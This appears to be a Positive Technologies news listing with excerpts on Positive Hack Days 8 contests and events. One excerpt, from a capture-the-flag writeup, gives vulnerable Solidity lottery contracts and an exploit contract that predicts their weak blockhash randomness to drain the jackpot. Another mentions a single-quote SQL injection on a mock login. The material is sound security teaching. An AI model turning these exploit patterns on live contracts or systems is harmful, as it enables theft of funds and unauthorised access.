News

10/4/2018

Positive Hack Days 9 to be held May 21–22 at Crocus Expo

The dates of the ninth Positive Hack Days are now out: next year's forum will take place at an all-new venue, the Crocus Expo International Exhibition Center, on May 21–22, 2019. More visitors are coming to PHDays every year: in 2018, over 5,000 people were in attendance. Crocus Expo offers more space than the World Trade Center Moscow, which will enable hosting an even larger number of guests and speakers. Preparations have already started for the event program, The Standoff, and competition infrastructure. The agenda will include several tracks addressing security research, technology-related risks for businesses and governments, and other topics. A new point of emphasis will be the impact of information security on the lives of ordinary people. In addition, effort will be made at PHDays 9 to reach out beyond security practitioners to include developers and IT professionals. A number of talks and workshops will attempt to bridge the gap between the IT and infosec worlds. Timing of the Call for Papers has been announced: proposals from interested speakers will be accepted from January 14 to March 14, 2019. Tickets for PHDays will go on sale in December. As in past years, PHDays promises to excite with its competitions, in which participants demonstrate threats potentially facing critical infrastructure, banking and government systems, blockchain, the Internet of Things, and more. Spring is still over six months away, so in the meantime we encourage you to enjoy the highlights from PHDays 8, recordings of which you can watch online.

8/8/2018

The Standoff at Positive Hack Days 8: attack debriefing

The Standoff was back this year at Positive Hack Days 8, where over 100 participants on 12 attacker teams, 7 defender teams, and security operations center (SOC) teams were eager to show their mastery of the digital systems of an entire mock city. The city network was monitored by three Positive Technologies products: MaxPatrol SIEM** – security information and event management (SIEM) PT Network Attack Discovery** – network traffic analysis, incident detection, and investigation PT MultiScanner** – multilevel system for identifying and blocking malicious content Functioning of these products and game events were all under the watchful gaze of the Positive Technologies Expert Security Center (PT ESC), which shared its findings with the PHDays audience. So many events took place that it would be impossible to describe them all. Here we will focus on describing the networks of Office 2 (belonging to fictional systems integrator SPUTNIK) and Office 1 (belonging to fictional insurer BeHealthy). Office 2 was interesting because it was monitored by the Rostelecom SOC, but not under the protection of any defender team, due to which attackers had free run of its systems. Besides these two offices, the city also contained an electrical plant with substation, railroad, smart homes, and banks with ATMs.

7/25/2018

Cyberbattle at PHDays, or How to hack city infrastructure in 30 hours

For the third year running, the highlight of the hacking contests at Positive Hack Days is The Standoff, in which teams of attackers, defenders, and security operations centers (SOCs) do battle in a virtual city. Experience in 2016 and 2017 showed the appeal of this ultrarealistic format for both participants and visitors at PHDays. So there was no doubt among the organizers that The Standoff deserved to return this year. In 2018, a total of 19 teams took part in The Standoff, and for nearly 30 hours, these teams fought for control of the city. The defenders stood fast, but the attackers still managed to pull off some hacks: according to the rules, some targets were deliberately left unprotected. Meanwhile, the battle among the attacker teams for first place was rather hot indeed—the scoreboard was turned nearly upside down just half an hour before the end of play. Read on for a blow-by-blow account of what happened during these two exciting days. Day 1: Getting the lay of the digital land Events were slow in coming on the first day. Attackers took their time reconnoitering and learning about the targets. As announced previously, the city's economy was based on digital technologies. City infrastructure included an electrical plant and substation, railroad, office buildings, energy-efficient smart homes, banks with ATMs and self-service kiosks, mobile communications, the Internet, and online services.

6/22/2018

PHDays 8: EtherHack contest writeup

At this year's PHDays, we held an all-new contest named EtherHack. Participants were on the clock as they solved tasks involving smart contract vulnerabilities. Here we present the contest tasks along with a detailed explanation of the intended solutions. Azino 777 Win the lottery and hit the jackpot! The first three tasks featured poor randomness issues that were covered in our recent research: Predicting Random Numbers in Ethereum Smart Contracts. As an easy warmup, the first task was based on a pseudorandom number generator (PRNG) that relied on the blockhash of the last block as a source of entropy for generating random numbers: pragma solidity ^0.4.16;

contract Azino777 {


  function spin(uint256 bet) public payable {
    require(msg.value >= 0.01 ether);
    uint256 num = rand(100);
    if(num == bet) {
        msg.sender.transfer(this.balance);
    }
  }


  //Generate random number between 0 & max
  uint256 constant private FACTOR =  1157920892373161954235709850086879078532699846656405640394575840079131296399;
  function rand(uint max) constant private returns (uint256 result){
    uint256 factor = FACTOR * 100 / max;
    uint256 lastBlockNumber = block.number - 1;
    uint256 hashVal = uint256(block.blockhash(lastBlockNumber));


    return uint256((uint256(hashVal) / factor)) % max;
  }


  function() public payable {}
}
Because the result of block.blockhash(block.number-1) would be the same for any transaction within the same block, a successful attack could use an exploit contract with the same rand() function to call the target contract via an internal message: function WeakRandomAttack(address _target) public payable { target = Azino777(_target); } function attack() public { uint256 num = rand(100); target.spin.value(0.01 ether)(num); } Private Ryan We added a private seed, nobody will ever learn it! This task is a slightly tougher twist on the previous one. A variable seed, deemed private, was used as an offset to block.number so that the blockhash would not be dependent on the previous block. After each bet, seed would be overwritten with a new "random" value. This was the case with the Slotthereum lottery. contract PrivateRyan { uint private seed = 1; function PrivateRyan() { seed = rand(256); } function spin(uint256 bet) public payable { require(msg.value >= 0.01 ether); uint256 num = rand(100); seed = rand(256); if(num == bet) { msg.sender.transfer(this.balance); } } /* ... */ } Similarly to the previous task, an attacker would just need to copy the rand() function into the exploit contract, but this time the value of the private variable seed would need to be obtained off-chain and then supplied to the exploit as an argument. To do so, one could take advantage of the web3.eth.getStorageAt() method of the web3 library:

6/19/2018

MeterH3cker contest writeup: hacking smart meters at PHDays 8

The contests at this year's Positive Hack Days included MeterH3cker, an all-new competition for hacking the smart grid. Participants had the run of two mock buildings powered by solar panels; excess power was sold back to the grid at a special rate. The job of the participants was to interfere with metering by any means necessary in order to improve their account balance. Stand

6/13/2018

Mr. Robot entertains visitors of PHDays 8

Mr. Robot again cheered guests of Positive Hack Days. This year, people could not only play a quiz, but also upgrade their skills using hacking tools or even have an interview for a job at Positive Technologies! Over 2,000 people came to have a talk with our chatbot, and that certainly boosted its artificial ego :) Keep reading for more details. What's new? The robot's software underwent substantial changes. Alexander Melkikh shared upgrade details: "We added new interactive features to our robot: in addition to contests (Quiz and Hacking Crash Course), it now has new activities—Get a Job at Positive Technologies and Meet Your Security Soulmate. Because of that, we had to rewrite the backend. Last year, we had had raw PHP that caused us a lot of problems, that's why this time we applied Falcon, an easy-to-use Python web framework." Contests The forum visitors enjoyed the contests. The most popular again was the Quiz. The rules are similar to Who Wants to Be a Millionaire: participants are to answer multiple-choice questions of various complexity. We prepared many sets, each containing five questions that were randomly displayed on the screen. Most questions were tongue-in-cheek, but some were intricate and related to information security, for example reverse engineering. If a participant made a mistake, the robot neglected the first law of robotics for a while and punished the unlucky contestant with a water jet shower so strong that it even bystanders got under it. So, everyone could refresh a little in the midst of PHDays :) Winning the Quiz brought no awards, because the robot believes that it's not the winning that counts, it's the taking part and enjoying the process. No wonder the second popular contest was the Hacking Crash Course, because we wanted participants to have fun and try their hands in different subjects in a short time. This contest had three courses, about 15 seconds each. The first course, SQL Injection, was a fictitious e-banking website with a form to enter login and password. To bypass authorization, participants had to press the single quote key on the software keyboard and then click Enter. This year, participants could try out IDA and Radare disassemblers. The IDA course teaches a well-known function that allows viewing all strings in binary files and is summoned by a combination of Shift and F12. The Radare course explained how to quit the disassembler. The authors of the course meant to joke about complicated and obscure key combinations in Radare. The robot was friendly and had prompts for participants: if someone did not know which keys to press, the correct key on the keyboard dimly lit up in several seconds, so all participants successfully completed their training. Successful completion of the course was confirmed by a certificate with a participant's photo—a webcam above the screen made a photo at the course completion. The most complex and important part of the robot activity this year was an interview for a job at Positive Technologies. Penetration testers and incident response and application protection specialists created quizzes for applicants in various spheres. An applicant should choose one of suggested spheres and answer 5 questions from a considerable list. More than one answer could be correct for some questions. If an interview had positive results, an applicant's photo and test results were sent to the HR chat in Telegram, and a certificate was printed out. The applicant could come to the HR stand with this certificate to receive a gift and continue the interview. The contest Meet Your Security Soulmate was similar to Tinder, a popular dating application. The only difference was that participants needed to swipe quotations of information security celebrities, not photos. Part of quotations were real, and some were generated based on original utterances. If most quotations were by the same person, the robot showed the photo of this celebrity and a participant together and turned on a romantic song. Resume Statistics confirmed that people are eager to communicate with artificial intelligence. More than two thousand people took part in the robot's contests during the two days of the forum. About 1,800 participants tried the Quiz (in 2017 there were 1,400 participants), and 820 got a water shower for wrong answers (1,300 people were unlucky in 2017). The Hacking Crash Course was taken by 160 people (360 in 2017). Interview for a job at Positive Technologies was taken by 226 people, and 105 participants found their security soulmate.

6/8/2018

PHDays 8: hunting for IP camera zero-days at CAMBreaker

More than 5,000 visitors came to Positive Hack Days this year, the majority of them security professionals. Their creativity and fine-tuned technical intuition were on full display in the hacking contests. CAMВreaker was no exception. In this article, we describe the preparations, techniques, and victors in this marathon of IP camera hacking. At CAMBreaker, any visitor could try out the role of surveillance camera hacker by attempting to obtain unauthorized access to IoT devices and searching for vulnerabilities in firmware source code. Fun prizes awaited the most successful bug hunters! Preparations for the contest began two months in advance. It was not easy by any means! This process consisted of several stages: Choosing which cameras to include. Checking the firmware versions, software, and operability of the cameras. Obtaining the firmware for each camera. Several methods were used: Intercepting firmware during camera updates via an Android app. Downloading firmware from the vendor's official site. Connecting to the device via Telnet. Connecting to the device via UART. This physical protocol (which stands for "universal asynchronous receiver transmitter") is rather old and the most widespread one in use today. The most well-known protocol in the UART family is RS-232 (commonly known as a COM port). Clipping a programmer to the flash chips inside the camera without de-soldering. And if all else fails, de-soldering the chips and reading them with a flash programmer. Configuring static IP addresses and credentials on the cameras. Designing and setting up a local network for the stand at PHDays. Setting up the stand in the demo environment. Here are a few photos illustrating the work involved:

6/6/2018

HackBattle 2.0: school canteen ICO under attack

In May 2017, Positive Hack Days VII presented a brand new contest named HackBattle, which attracted audience attention. Almost 100 security specialists took part in that contest. The audience was so eager to see the final that the area was packed (more details in the last year's review). Inspired by professionals' interest, we decided to hold HackBattle 2.0 at PHDays 8. Learn how the contest passed this year, and check if you can solve the tasks. Participation rules The contest was held on both days of PHDays. During the first day, there was a qualifying stage: we selected two strongest and bravest participants who solved most tasks within the minimum period. The final of the contest was on the second day. Two hackers were to attack one aim, and the first to get through and escalate privileges on the target system was the winner. The progress was commented by security experts, and highlights could be followed on a large screen. Qualification As in the previous year, the participants were to solve CTF-format tasks against the clock. Each participant had 35 minutes to solve 10 tasks and earn a certain amount of points, depending on the task complexity. Each participant could take part in qualification only once. This time we took into account the requests of participants of the first HackBattle and allowed using not only our workstations but also participants' laptops.

6/4/2018

PHDays 8: Competitive Intelligence contest writeup

Held in the weeks leading up to Positive Hack Days, the Competitive Intelligence contest offered a chance to compete at open-source online sleuthing. This year, the contest had a bit of cryptostartup flair: tasks centered around NotSoPositive, a fictional small company holding a typical ICO. The company's imaginary founders and employees, as well as their friends and family, went under the microscope. To succeed, competitors needed to have intricate knowledge of the workings of online services and social networks, combined with skill at making inferences and inspired guesses. Tasks were designed with both veterans and newbies in mind—anyone could walk away with at least one flag. Many tasks fit with each other in a logical sequence, forming entire storylines. Other tasks could be completed independently of the rest, which was why participants were asked to keep a record of information at each step. As an easy warmup, a simple Google search was enough to find the company's page, which was the jumping-off point for all the other tasks:

5/30/2018

PHDays 8: cash-hungry hackers refuse to Leave ATM Alone

Positive Hack Days 8 continued a number of fun traditions from past years, among them the Leave ATM Alone contest. All comers were invited to hack two ATMs provided by our Banking Security partner Alfa Bank (to make things easier for hackers, we specially configured and hid vulnerabilities on the ATMs prior to the contest start). Participants had 15 minutes to bypass security and cash out. Around 40 participants tried their luck, with a total of 40,000 rubles at stake. Leonid Krolle, the Positive Technologies banking security researcher in charge of the contest, told us about the twists and turns that followed.

1...78910...25